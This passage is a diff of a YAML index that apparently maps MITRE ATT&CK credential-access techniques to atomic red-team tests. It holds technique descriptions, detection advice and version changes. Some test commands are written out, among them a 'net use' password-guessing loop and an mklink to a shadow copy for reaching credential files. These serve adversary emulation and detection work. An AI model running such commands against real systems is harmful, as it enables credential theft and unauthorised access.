- id: attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Forced Authentication
- description: |-
- Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
-
- The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
-
- Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
-
- Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)
-
- There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:
-
- * A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
- * A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)
+ created: '2018-01-16T16:13:52.465Z'
+ modified: '2020-06-19T17:16:41.470Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1187
@@ -18196,32 +19028,40 @@ credential-access:
Threat Activity Targeting Energy and Other Critical Infrastructure Sectors.
Retrieved November 2, 2017.'
source_name: US-CERT APT Energy Oct 2017
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-06-19T17:16:41.470Z'
- created: '2018-01-16T16:13:52.465Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
+ description: |-
+ Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
- Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)
+ The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
+
+ Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
+
+ Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)
+
+ There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:
+
+ * A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
+ * A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)
+ name: Forced Authentication
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2
+ x_mitre_version: '1.2'
+ x_mitre_contributors:
+ - Teodor Cimpoesu
+ - Sudhanshu Chauhan, @Sudhanshu_C
x_mitre_data_sources:
- File monitoring
- Network protocol analysis
- Network device logs
- Process use of network
- x_mitre_contributors:
- - Teodor Cimpoesu
- - Sudhanshu Chauhan, @Sudhanshu_C
- x_mitre_version: '1.2'
+ x_mitre_detection: |-
+ Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
+
+ Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1056.002:
technique:
@@ -18257,7 +19097,7 @@ credential-access:
are executed that need additional privileges than are present in the current
user context, it is common for the operating system to prompt the user for
proper credentials to authorize the elevated privileges for the task (ex:
- [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries
+ [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries
may mimic this functionality to prompt users for credentials with a seemingly
legitimate prompt for a number of reasons that mimic normal usage, such as
a fake installer requiring additional access or a fake malware removal suite.(Citation:
@@ -18566,9 +19406,9 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-24T21:29:13.900Z'
+ modified: '2020-10-21T01:31:35.760Z'
created: '2017-05-31T21:30:48.323Z'
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
x_mitre_data_sources:
@@ -18598,6 +19438,7 @@ credential-access:
- Linux
- macOS
- Windows
+ - Network
x_mitre_is_subtechnique: false
atomic_tests: []
T1558.003:
@@ -18636,6 +19477,9 @@ credential-access:
- source_name: mitre-attack
external_id: T1558.003
url: https://attack.mitre.org/techniques/T1558/003
+ - external_id: CAPEC-509
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/509.html
- url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
@@ -18660,6 +19504,7 @@ credential-access:
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
Guard Dog of Hades. Retrieved March 22, 2018.
source_name: SANS Attacking Kerberos Nov 2014
+ url: https://redsiege.com/kerberoast-slides
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
Retrieved March 23, 2018.
@@ -18668,7 +19513,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-02-27T18:25:30.124Z'
+ modified: '2020-10-20T19:30:10.687Z'
created: '2020-02-11T18:43:38.588Z'
x_mitre_contributors:
- Praetorian
@@ -18686,7 +19531,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
identifier: T1558.003
atomic_tests:
- name: Request for service tickets
@@ -18781,15 +19626,21 @@ credential-access:
T1056.001:
technique:
id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
- description: |-
- Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
-
- Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
-
- * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
- * Reading raw keystroke data from the hardware buffer.
- * Windows Registry modifications.
- * Custom drivers.
+ description: "Adversaries may log user keystrokes to intercept credentials as
+ the user types them. Keylogging is likely to be used to acquire credentials
+ for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003)
+ efforts are not effective, and may require an adversary to intercept keystrokes
+ on a system for a substantial period of time before credentials can be successfully
+ captured.\n\nKeylogging is the most prevalent type of input capture, with
+ many different ways of intercepting keystrokes.(Citation: Adventures of a
+ Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing
+ keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004),
+ this focuses solely on API functions intended for processing keystroke data.\n*
+ Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n*
+ Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601)
+ may provide adversaries with hooks into the operating system of network devices
+ to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device
+ Attacks) "
name: Keylogging
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -18805,20 +19656,25 @@ credential-access:
description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
look into keyloggers on Windows. Retrieved April 27, 2016.'
source_name: Adventures of a Keystroke
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-24T20:45:52.998Z'
+ modified: '2020-10-21T01:30:56.227Z'
created: '2020-02-11T18:58:11.791Z'
x_mitre_platforms:
- Windows
- macOS
- Linux
+ - Network
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification
to the Registry and installation of a driver, setting a hook, or polling to
intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`,
@@ -19059,29 +19915,13 @@ credential-access:
elevation_required: true
T1003.001:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1003.001
- url: https://attack.mitre.org/techniques/T1003/001
- - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
- description: Graeber, M. (2014, October). Analysis of Malicious Security Support
- Provider DLLs. Retrieved March 1, 2017.
- source_name: Graeber 2014
- - url: https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/
- description: Wilson, B. (2016, April 18). The Importance of KB2871997 and
- KB2928120 for Credential Protection. Retrieved April 11, 2018.
- source_name: TechNet Blogs Credential Protection
- - description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
- from Memory. Retrieved October 11, 2019.
- url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: LSASS Memory
+ created: '2020-02-11T18:41:44.783Z'
+ modified: '2020-06-09T20:46:00.393Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
+ id: attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -19105,32 +19945,48 @@ credential-access:
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
- id: attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-06-09T20:46:00.393Z'
- created: '2020-02-11T18:41:44.783Z'
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- x_mitre_data_sources:
- - Process command-line parameters
- - PowerShell logs
- - Process monitoring
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
+ name: LSASS Memory
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1003.001
+ url: https://attack.mitre.org/techniques/T1003/001
+ - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
+ description: Graeber, M. (2014, October). Analysis of Malicious Security Support
+ Provider DLLs. Retrieved March 1, 2017.
+ source_name: Graeber 2014
+ - url: https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/
+ description: Wilson, B. (2016, April 18). The Importance of KB2871997 and
+ KB2928120 for Credential Protection. Retrieved April 11, 2018.
+ source_name: TechNet Blogs Credential Protection
+ - description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
+ from Memory. Retrieved October 11, 2019.
+ url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
+ source_name: Medium Detecting Attempts to Steal Passwords from Memory
+ - url: https://github.com/mattifestation/PowerSploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ source_name: Powersploit
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - PowerShell logs
+ - Process monitoring
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
identifier: T1003.001
atomic_tests:
- name: Windows Credential Editor
@@ -19416,7 +20272,7 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2020-03-31T13:54:08.535Z'
+ modified: '2020-10-16T15:19:48.733Z'
created: '2020-02-11T19:07:12.114Z'
x_mitre_contributors:
- Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
@@ -19429,7 +20285,7 @@ credential-access:
- Packet capture
x_mitre_permissions_required:
- User
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
@@ -19477,7 +20333,7 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-07-13T21:23:01.762Z'
+ modified: '2020-10-21T02:41:11.743Z'
created: '2020-02-11T19:01:56.887Z'
x_mitre_data_sources:
- File monitoring
@@ -19508,12 +20364,13 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g., a user has an active
login session but has not entered the building or does not have VPN access)."
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
+ - Network
atomic_tests: []
T1003.003:
technique:
@@ -19775,6 +20632,54 @@ credential-access:
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
name: command_prompt
elevation_required: true
+ T1556.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1556.004
+ url: https://attack.mitre.org/techniques/T1556/004
+ - source_name: FireEye - Synful Knock
+ url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html
+ description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
+ Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Image File Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Image File Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ description: |-
+ Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
+
+ [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)
+ name: Network Device Authentication
+ id: attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-21T02:41:11.550Z'
+ created: '2020-10-19T17:58:04.155Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: |-
+ Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
+
+ Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1040:
technique:
created: '2017-05-31T21:30:41.399Z'
@@ -20169,6 +21074,9 @@ credential-access:
- source_name: mitre-attack
external_id: T1110.002
url: https://attack.mitre.org/techniques/T1110/002
+ - external_id: CAPEC-55
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/55.html
- url: https://en.wikipedia.org/wiki/Password_cracking
description: Wikipedia. (n.d.). Password cracking. Retrieved December 23,
2015.
@@ -20193,7 +21101,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-07-09T17:01:18.054Z'
+ modified: '2020-09-16T15:39:59.041Z'
created: '2020-02-11T18:38:56.197Z'
x_mitre_data_sources:
- Authentication logs
@@ -20205,7 +21113,7 @@ credential-access:
efforts on detecting other adversary behavior used to acquire credential materials,
such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003)
or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
@@ -20359,10 +21267,13 @@ credential-access:
- source_name: mitre-attack
external_id: T1110.001
url: https://attack.mitre.org/techniques/T1110/001
- - url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
+ - external_id: CAPEC-49
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/49.html
+ - source_name: Cylance Cleaver
description: Cylance. (2014, December). Operation Cleaver. Retrieved September
14, 2017.
- source_name: Cylance Cleaver
+ url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
- source_name: US-CERT TA18-068A 2018
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
@@ -20399,7 +21310,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-29T17:11:46.504Z'
+ modified: '2020-10-19T22:43:45.126Z'
created: '2020-02-11T18:38:22.617Z'
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
@@ -20412,7 +21323,7 @@ credential-access:
failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
authentication failures are high, then there may be a brute force attempt
to gain access to a system using legitimate credentials.
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
@@ -20463,12 +21374,6 @@ credential-access:
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
T1110.003:
technique:
- created: '2020-02-11T18:39:25.122Z'
- modified: '2020-03-29T17:13:57.172Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- type: attack-pattern
id: attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -20499,6 +21404,9 @@ credential-access:
- source_name: mitre-attack
external_id: T1110.003
url: https://attack.mitre.org/techniques/T1110/003
+ - external_id: CAPEC-565
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/565.html
- url: http://www.blackhillsinfosec.com/?p=4645
description: Thyer, J. (2015, October 30). Password Spraying & Other Fun with
RPCCLIENT. Retrieved April 25, 2017.
@@ -20511,6 +21419,12 @@ credential-access:
url: https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing
description: 'Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password
Spraying with Security Event Auditing. Retrieved January 16, 2019.'
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-10-19T22:43:45.579Z'
+ created: '2020-02-11T18:39:25.122Z'
x_mitre_platforms:
- Linux
- macOS
@@ -20522,7 +21436,7 @@ credential-access:
- Azure AD
- SaaS
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: |-
Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.
@@ -21277,6 +22191,9 @@ credential-access:
- source_name: mitre-attack
external_id: T1558
url: https://attack.mitre.org/techniques/T1558
+ - external_id: CAPEC-652
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/652.html
- source_name: ADSecurity Kerberos Ring Decoder
url: https://adsecurity.org/?p=227
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
@@ -21330,7 +22247,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-31T12:59:11.121Z'
+ modified: '2020-09-29T16:16:06.868Z'
created: '2020-02-11T19:12:46.830Z'
x_mitre_system_requirements:
- Kerberos authentication enabled
@@ -21356,7 +22273,7 @@ credential-access:
access the LSA Subsystem Service (LSASS) process by opening the process, locating
the LSA secrets key, and decrypting the sections in memory where credential
details, including Kerberos tickets, are stored."
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
@@ -21461,7 +22378,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-06-17T14:25:38.461Z'
+ modified: '2020-10-15T19:39:36.109Z'
created: '2020-02-04T12:47:23.631Z'
x_mitre_platforms:
- Linux
@@ -21478,7 +22395,7 @@ credential-access:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: |-
While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
@@ -21488,6 +22405,10 @@ credential-access:
Additionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.
x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Windows event logs
- File monitoring
- Windows Registry
- Process monitoring
@@ -21495,23 +22416,6 @@ credential-access:
atomic_tests: []
T1056.003:
technique:
- created: '2020-02-11T18:59:50.058Z'
- modified: '2020-03-24T21:16:16.580Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- type: attack-pattern
- id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
- description: |-
- Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
-
- This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)
- name: Web Portal Capture
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1056.003
@@ -21523,19 +22427,2728 @@ credential-access:
description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco
Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.'
source_name: Volexity Virtual Private Keylogging
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Web Portal Capture
+ description: |-
+ Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
+
